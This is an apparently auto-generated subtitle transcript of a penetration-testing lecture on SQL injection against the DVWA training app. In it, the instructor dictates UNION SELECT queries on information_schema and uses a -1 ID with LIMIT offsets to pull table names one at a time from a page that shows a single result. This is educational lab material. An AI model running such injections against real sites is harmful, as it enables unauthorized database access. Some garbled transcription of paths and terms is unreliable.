1 00:00:00,990 --> 00:00:07,000 And this lecture I'd like to cover a case that I face in pretty much 50 percent of the websites that 2 00:00:07,000 --> 00:00:09,150 I do penetration testing on. 3 00:00:09,190 --> 00:00:16,000 So let me first just run and exploit the ones I've already seen so we're just going to run this statement 4 00:00:16,000 --> 00:00:20,040 which will select the table name from information schema tables. 5 00:00:20,080 --> 00:00:25,080 So this should list all the tables that exist within our page. 6 00:00:25,330 --> 00:00:30,040 And I have my security set too low at the moment so I'm just going to paste that here. 7 00:00:30,940 --> 00:00:32,970 Remove this extra one and hit enter 8 00:00:35,730 --> 00:00:41,590 as you can see it gets exploited and it shows us the table name here instead of number one. 9 00:00:41,790 --> 00:00:46,650 So we see all the table names that exist within this current database. 10 00:00:48,770 --> 00:00:55,790 Now the case that I'd like to cover is when you actually run the statement so the website will be vulnerable. 11 00:00:55,790 --> 00:01:02,210 And when you run the statement you will only see one result at a time and that's because the page is 12 00:01:02,570 --> 00:01:06,220 programmed in a way to display only one result at a time. 13 00:01:06,410 --> 00:01:12,730 To do this we're actually going to need to modify the code for the low security level for DPW I will 14 00:01:12,740 --> 00:01:15,770 do that now and then we'll come back to exploit it. 15 00:01:15,770 --> 00:01:18,670 So I'm actually just going to modify the code for DVD-Video. 16 00:01:18,680 --> 00:01:20,650 This is not part of the exploitation. 17 00:01:20,780 --> 00:01:24,860 This is just to make this exploit a little bit trickier. 18 00:01:24,960 --> 00:01:33,050 So I've missed Meta's floatable now and I'm going to open the low security level of the SQL Injection 19 00:01:33,050 --> 00:01:33,620 file. 20 00:01:33,890 --> 00:01:41,180 So I'm going to use sudo because the file has root permissions and I'm going to use Nonno as the text 21 00:01:41,180 --> 00:01:43,500 editor. 22 00:01:43,530 --> 00:01:53,570 So this is the program that I will use to modify the file and the file is stored in var w w w w o a 23 00:01:54,530 --> 00:02:02,270 vulnerability is a skill injection source and then lo ph. 24 00:02:02,670 --> 00:02:07,080 So again I'm just going to go through this come and see what we're doing is we're saying we're saying 25 00:02:07,080 --> 00:02:09,850 sudo to run the file in root privileges. 26 00:02:09,850 --> 00:02:12,790 Now what is the program that we're going to open the file with. 27 00:02:12,960 --> 00:02:21,920 And then the file is stored in Varda readable WDW I Woolner abilities as Kulai source Lowder's ph. 28 00:02:22,440 --> 00:02:29,060 I'm going to hit enter and asking me for the admin password now the root password is as admin. 29 00:02:29,060 --> 00:02:35,310 Exactly like the username. 30 00:02:35,490 --> 00:02:37,800 We have the source here for the file. 31 00:02:37,800 --> 00:02:40,910 So I'm going to modify it here I'm actually going to modify this to you. 32 00:02:40,980 --> 00:02:47,460 So what this loop does it actually loops through all the characters all the records that this askew 33 00:02:47,580 --> 00:02:50,110 statement gets right here. 34 00:02:50,250 --> 00:02:52,560 And then it displays them on screen. 35 00:02:52,560 --> 00:02:57,220 So what we want is we want to modify it to only display words of the first result. 36 00:02:57,270 --> 00:03:00,980 So I'm just going to comment this line two forward slashes other comment. 37 00:03:00,990 --> 00:03:08,220 So basically this line will be ignored and I'll also comment this line because it closes the while loop. 38 00:03:08,700 --> 00:03:10,620 So this line will be ignored as well. 39 00:03:11,940 --> 00:03:16,340 Now you really need to care to worry about what this means if you're not a programmer. 40 00:03:16,350 --> 00:03:21,320 It's not very important just come into these lines and we'll see what happens at the client site because 41 00:03:21,320 --> 00:03:26,100 what we're what we're interested in this lecture is not the programming we're interested in to the penetration 42 00:03:26,100 --> 00:03:27,060 testing. 43 00:03:27,090 --> 00:03:29,820 So I'm just going to hit control X to save this. 44 00:03:30,000 --> 00:03:36,170 I'm going to hit Y and enter and that'll quit and save the file. 45 00:03:36,190 --> 00:03:41,170 So we're back here and I'm going to run exactly the same statement so I'm not going to modify it. 46 00:03:41,200 --> 00:03:46,270 So I'm still saying unions select table name from information schema other tables. 47 00:03:47,710 --> 00:03:50,260 I'm actually going to refresh the page. 48 00:03:50,510 --> 00:03:56,140 And as you can see now this is not really working or is it working but it's only shown us the first 49 00:03:56,560 --> 00:04:02,960 the first record that's been selected which is the American So this is not even useful. 50 00:04:03,870 --> 00:04:08,910 So the first thing that I'm going to do is this is bringing us the record because the admin has the 51 00:04:08,910 --> 00:04:11,600 ID of number one. 52 00:04:11,610 --> 00:04:16,410 So what we're going to do now is we're actually just going to give it an invalid ID so I'm going to 53 00:04:16,410 --> 00:04:21,610 give it an A minus one. 54 00:04:21,660 --> 00:04:26,910 And as you can see now the statement works we're getting a table that exists in the information schema 55 00:04:27,030 --> 00:04:29,940 tables but we're all together in one table at a time. 56 00:04:29,940 --> 00:04:32,230 We're not getting the full list of the tables. 57 00:04:32,580 --> 00:04:37,420 And this is because the page is programmed in a way that will only display one result. 58 00:04:37,610 --> 00:04:42,260 And this happened to me a lot with a lot of times when I'm doing penetration testing. 59 00:04:42,300 --> 00:04:50,190 So keep in mind that we can run any all statement that we want on the tape on the server so we can modify 60 00:04:50,190 --> 00:04:56,210 our skill statement to iterate over all the records and display the content. 61 00:04:56,220 --> 00:05:02,970 So what we're going to do is we're going to know obviously can use the word statement to only show database 62 00:05:03,090 --> 00:05:08,070 tables within your current database but at the at the at the moment I want to show you how it how to 63 00:05:08,070 --> 00:05:10,450 iterate over all the tables. 64 00:05:10,710 --> 00:05:18,420 So what we're going to do instead is use the limit keyword to specify which record we want to display. 65 00:05:18,570 --> 00:05:26,190 With the current statement this way we'll be able to iterate over the records one by one and display 66 00:05:26,250 --> 00:05:28,010 all of them. 67 00:05:28,210 --> 00:05:35,830 So the statement is going to be unioned select table name from information schema or tables and we're 68 00:05:35,830 --> 00:05:41,550 going to say I want to limit the limit keyword takes two values. 69 00:05:41,710 --> 00:05:48,740 The first value is the location of the record that we want to start displaying records from. 70 00:05:48,790 --> 00:05:56,800 So where we want to start displaying records so I want to start displaying records from the first record. 71 00:05:56,900 --> 00:06:04,840 So I'm going to put zero because the record numbers start at 0 and the second value that the limit keyword 72 00:06:04,840 --> 00:06:12,250 takes is the number of records that we want to display on screen starting at the value that we specified 73 00:06:12,250 --> 00:06:13,660 in here. 74 00:06:13,660 --> 00:06:19,000 Now we know that this page right here can only show me one record at a time. 75 00:06:19,030 --> 00:06:22,520 So the second value to the limit keyword can only be one. 76 00:06:22,570 --> 00:06:24,110 In this case. 77 00:06:24,160 --> 00:06:30,740 So basically what we're saying is we want to select the table name from the information schema tables. 78 00:06:30,880 --> 00:06:36,250 I only wanted to display one record starting from record 0. 79 00:06:36,250 --> 00:06:40,490 So if I copy this and paste it here 80 00:06:44,270 --> 00:06:51,680 you'll see I'll get the first table right now and then if I want to go to the second table all I have 81 00:06:51,680 --> 00:06:58,430 to do is modify this so like I said this value the first value in here means I want to start at record 82 00:06:58,430 --> 00:06:59,240 0. 83 00:06:59,240 --> 00:07:07,310 So if I want to start at record 1 I'm just going to put one and then I can copy this and paste it up 84 00:07:07,350 --> 00:07:11,220 in here again. 85 00:07:11,340 --> 00:07:13,610 As you can see we got the next table. 86 00:07:13,650 --> 00:07:20,290 Now again if I want to get the table after this all I have to do is modify this and set it to 2. 87 00:07:20,400 --> 00:07:25,440 And that means that I want to start this play in from record to and I only want to start to display 88 00:07:25,440 --> 00:07:26,880 one record. 89 00:07:26,880 --> 00:07:31,610 Again if I hit enter as you can see I'm getting the next table. 90 00:07:31,680 --> 00:07:38,000 I can keep doing this to iterate over all the records manually. 91 00:07:38,020 --> 00:07:41,880 Now we can also enhance the statement by using the workloads. 92 00:07:41,890 --> 00:07:50,140 So before the limit we can say I want to select a table name from information schema tables where table 93 00:07:50,140 --> 00:07:57,370 schema is equal to DV w a. 94 00:07:57,420 --> 00:08:06,240 Now if we paste this in here as you can see this has shown me the users and again I can iterate over 95 00:08:06,390 --> 00:08:13,740 the tables by changing the number here so this is display in the record at offset 1. 96 00:08:13,740 --> 00:08:17,420 I can set this to 0 to display the first record. 97 00:08:17,520 --> 00:08:23,930 And as you can see the first table or the first record is guestbook and that's it. 98 00:08:23,930 --> 00:08:27,830 So just a quick a nice letter to show you how to bypass this problem. 99 00:08:27,920 --> 00:08:35,090 If you face it in pages that would only display one value or one record for you at a time.